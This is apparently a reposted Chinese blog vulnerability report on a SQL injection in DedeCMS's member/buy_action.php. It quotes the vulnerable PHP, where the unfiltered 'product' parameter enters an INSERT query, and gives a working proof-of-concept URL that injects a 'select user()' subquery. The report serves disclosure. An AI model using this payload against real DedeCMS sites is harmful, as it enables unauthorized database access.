zoukankan      html  css  js  c++  java
  • Dedecms会员中心注入漏洞

    详细说明:
    member/buy_action.php
     
    require_once(dirname(__FILE__)."/config.php");
     
    CheckRank(0,0);
     
    $menutype = 'mydede';
     
    $menutype_son = 'op';
     
    require_once DEDEINC.'/dedetemplate.class.php';
     
     
     
    $product = isset($product) ? trim($product) : '';
     
    $mid = $cfg_ml->M_ID;
     
    $ptype = '';
     
    $pname = '';
     
    $price = '';
     
    $mtime = time();
     
    省略XX行
     
    if(empty($product))
     
    {
     
        ShowMsg("请选择一个产品!", 'javascript:;');
     
        exit();
     
    }
     
    省略xxx行
     
    =if(!isset($paytype))
     
    {    
     
        $inquery = "INSERT INTO #@__member_operation(`buyid` , `pname` , `product` , `money` , `mtime` , `pid` , `mid` , `sta` ,`oldinfo`)
     
       VALUES ('$buyid', '$pname', '$product' , '$price' , '$mtime' , '$pid' , '$mid' , '0' , '$ptype');//product没有过滤
     
        ";
     
    echo  $inquery."<br>" ;
    漏洞证明:
    测试方法
     
    注册用户之后验证邮箱完了之后 打开
     
    127.0.0.1/dedecms/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select user()),(select 1),'4
     
    然后在http://127.0.0.1/dedecms/member/operation.php
     
    就可以查看到返回信息了
  • 相关阅读:
    ES6语法:var、let、const的区别详解
    idea新建springboot项目
    Serlvet之cookie和session学习
    常见排序算法
    Spring MVC拦截器学习
    分组数据
    redis数据库学习
    redis实现排行榜
    redis整合springboot的helloworld
    dubbo整合springboot最详细入门教程
  • 原文地址:https://www.cnblogs.com/milantgh/p/3634519.html
Copyright © 2011-2022 走看看